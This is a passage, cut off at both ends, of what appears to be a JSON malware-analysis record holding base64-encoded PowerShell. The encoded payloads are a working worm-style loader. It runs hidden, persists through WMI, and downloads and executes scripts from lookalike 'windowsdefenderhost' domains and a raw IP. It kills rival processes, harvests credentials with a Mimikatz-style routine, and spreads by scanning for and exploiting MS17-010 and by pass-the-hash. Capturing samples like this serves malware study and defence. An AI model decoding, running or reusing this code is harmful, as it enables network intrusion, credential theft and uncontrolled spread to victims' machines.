gAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQ